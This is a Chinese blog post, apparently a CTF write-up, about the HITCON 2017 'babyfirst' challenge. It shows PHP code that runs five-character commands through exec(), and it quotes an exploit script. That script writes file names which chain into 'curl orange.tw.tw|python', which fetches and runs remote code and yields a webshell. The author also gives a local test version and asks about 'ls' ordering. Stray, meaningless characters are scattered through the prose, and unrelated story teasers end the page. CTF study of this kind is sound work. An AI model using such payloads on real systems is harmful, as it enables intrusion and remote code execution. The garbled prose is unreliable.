從HITCON2017 babyfirst去研究ls命令

前幾天做了一道HITCON2017的web題目硫豆,與朋友交流之后熊响,有了一點思路,奈何最后還是沒有成功解出這題汗茄。在writeup出來后,在復(fù)現(xiàn)的過程中遇到了一些問題递览,記錄一下。

babyfirst的wp

題目的源碼:index.php

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

大致題目的意思就是镜雨,當(dāng)你在GET參數(shù)cmd的時候限制了字符的長度為5儿捧,思路就是要想辦法繞過這個限制來獲得webshell

官方給出的exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    '>on', 
    '>th\\', 
    '>py\\', 
    '>\|\\', 
    '>tw\\',
    '>e.\\', 
    '>ng\\', 
    '>ra\\', 
    '>o\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # exec
    'sh _', 
    'sh g', 
]



r = requests.get('http://52.199.204.34/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
    print i
    sleep(0.2)

由于我是在本地搭建的環(huán)境菲盾,不太清楚他的具體環(huán)境,只要演示通過這個index.php獲得一個webshell就行了懒鉴。
這個思路就是先想辦法通過ls命令疗我,構(gòu)造出包含 ls -t>g 這條命令的文件,然后再執(zhí)行它構(gòu)造出一個包含一句話木馬的webshell.
先參考這個文檔:


image.png

image.png

箭頭指向的那個字符串旧找,其實是<php? eval($_GET[1])的base64編碼麦牺,實際上最后執(zhí)行會base64解碼得到PHP一句話木馬。

回到之前的題目魏颓,要求的是cmd提交的參數(shù)長度小于等于5吱晒,為了實現(xiàn)更短的生成文件,我們使用>xxx的方式來生成一個名為xxx的文件叹话,而不是使用w>xxx墩瞳。
這個題目,由于最后要直接執(zhí)行ls -t>g這條命令的話喉酌,至少需要7位的長度,因此考慮先把
ls -t>g用同樣的方式把ls -t>g寫進一個文件般妙,然后使用sh命令執(zhí)行這個文件就可以代替ls -t>g的功能。
Exp中

    # generate `ls -t>g` file
    '>ls\\', 
#因為ls命令顯示的文件順序是按名稱來排序的霹陡,‘ \’ 會排列在 ‘ls\’ 的前面止状,因此需要先把 'ls\'先寫入'_'這個文件,因此執(zhí)行下面這條命令
    'ls>_', 
#后面的順序浆洗,ls時默認是按照以下順序的集峦,因此可以直接輸入
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
#最后執(zhí)行的這條命令,會附加到后面摘昌,正好與前面的 'ls\'結(jié)合到一起形成'ls -t>g'
    'ls>>_', 

這部分就是要完成這個功能高蜂。

重點來了,我們今天要談?wù)摰膯栴}就是與這個相關(guān)稿饰。

經(jīng)過實際的嘗試露泊,使用python腳本,把參數(shù)按照上面的順序post到webserver


image.png

執(zhí)行之后侣姆,確實在對應(yīng)的目錄下面生成了一個名為_的文件沉噩,這個文件的內(nèi)容為:

image.png

最后確實成功執(zhí)行了ls -t>g這個命令。

注:箭頭指向的 \ 實際是因為shell執(zhí)行換行的命令組合時,需要 \ 來進行轉(zhuǎn)義派歌,否則會單行順序執(zhí)行命令。

然而胶果,仔細看上面ls之后顯示的文件的排列順序,實際上在寫入'_'文件之后霎烙,生成的文件內(nèi)容不應(yīng)該是上面的樣子蕊连。
我實際在bash里面按順序執(zhí)行以下命令:

    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'
執(zhí)行exp.py得到的
直接在bash終端執(zhí)行得到的

生成的_文件的內(nèi)容與通過exp腳本提交參數(shù)之后生成的不一樣甘苍,而用sh執(zhí)行之后也不能成功執(zhí)行ls -t>g的命令。

究其原因看彼,就是因為ls命令列目錄的時候囚聚,'_'和'>g'這兩個文件的順序在-t>這個文件的前面。因此沒有辦法成功的構(gòu)造出一個ls -t>g的命令茁计。
經(jīng)過在我的虛擬機上測試(kali 2.0和ubuntu 16.04)上面測試跋破,使用bash和sh兩個終端執(zhí)行的結(jié)果都是一樣的,無法成功構(gòu)造出ls -t>g
我原本以為可能是與exec函數(shù)有關(guān)毒返,但是實際直接在終端執(zhí)行php文件的話拧簸,構(gòu)造的結(jié)果還是與bash的一樣。

因此盆赤,我得出的一個結(jié)論:

通過webserver中間件 和直接在終端, 執(zhí)行l(wèi)s命令颤枪,得到的文件的列表的順序是不一樣的淑际。具體的原因暫時還不清楚扇住,希望能有大佬給我指教盗胀。感激不盡。

附:本地腳本測試的時候的index.php腳本和exp.py

<?php
    $sandbox = '/var/www/html/sanbox/' . md5("orange" . $_SERVER['REMOTE_ADDR'])
;
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'
    ]

r = requests.post('http://127.0.0.1/test/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.post('http://127.0.0.1/test/?cmd=' + quote(i) )
    print i
    sleep(0.2)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市屑迂,隨后出現(xiàn)的幾起案子屈糊,更是在濱河造成了極大的恐慌,老刑警劉巖逻锐,帶你破解...
    沈念sama閱讀 212,454評論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件昧诱,死亡現(xiàn)場離奇詭異,居然都是意外死亡凶掰,警方通過查閱死者的電腦和手機蜈亩,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,553評論 3 385
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來畅涂,“玉大人道川,你說我怎么就攤上這事∶疤眩” “怎么了?”我有些...
    開封第一講書人閱讀 157,921評論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長崖技。 經(jīng)常有香客問我施流,道長鄙信,這世上最難降的妖魔是什么忿晕? 我笑而不...
    開封第一講書人閱讀 56,648評論 1 284
  • 正文 為了忘掉前任践盼,我火速辦了婚禮,結(jié)果婚禮上咕幻,老公的妹妹穿的比我還像新娘肄程。我一直安慰自己,他們只是感情好蓝厌,可當(dāng)我...
    茶點故事閱讀 65,770評論 6 386
  • 文/花漫 我一把揭開白布拓提。 她就那樣靜靜地躺著,像睡著了一般代态。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上西雀,一...
    開封第一講書人閱讀 49,950評論 1 291
  • 那天蒋搜,我揣著相機與錄音判莉,去河邊找鬼。 笑死券盅,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的娘侍。 我是一名探鬼主播,決...
    沈念sama閱讀 39,090評論 3 410
  • 文/蒼蘭香墨 我猛地睜開眼嚎杨,長吁一口氣:“原來是場噩夢啊……” “哼氧腰!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起箩帚,我...
    開封第一講書人閱讀 37,817評論 0 268
  • 序言:老撾萬榮一對情侶失蹤黄痪,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后是嗜,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體油额,經(jīng)...
    沈念sama閱讀 44,275評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,592評論 2 327
  • 正文 我和宋清朗相戀三年涩嚣,在試婚紗的時候發(fā)現(xiàn)自己被綠了航厚。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片锰蓬。...
    茶點故事閱讀 38,724評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖麻顶,靈堂內(nèi)的尸體忽然破棺而出舱卡,到底是詐尸還是另有隱情,我是刑警寧澤轮锥,帶...
    沈念sama閱讀 34,409評論 4 333
  • 正文 年R本政府宣布,位于F島的核電站新娜,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏还惠。R本人自食惡果不足惜私杜,卻給世界環(huán)境...
    茶點故事閱讀 40,052評論 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧寄猩,春花似錦、人聲如沸田篇。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,815評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽兽赁。三九已至冷守,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間亮钦,已是汗流浹背充活。 一陣腳步聲響...
    開封第一講書人閱讀 32,043評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留混卵,地道東北人。 一個月前我還...
    沈念sama閱讀 46,503評論 2 361
  • 正文 我出身青樓男公,卻偏偏與公主長得像,于是被迫代替她去往敵國和親澄阳。 傳聞我的和親對象是個殘疾皇子踏拜,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,627評論 2 350

推薦閱讀更多精彩內(nèi)容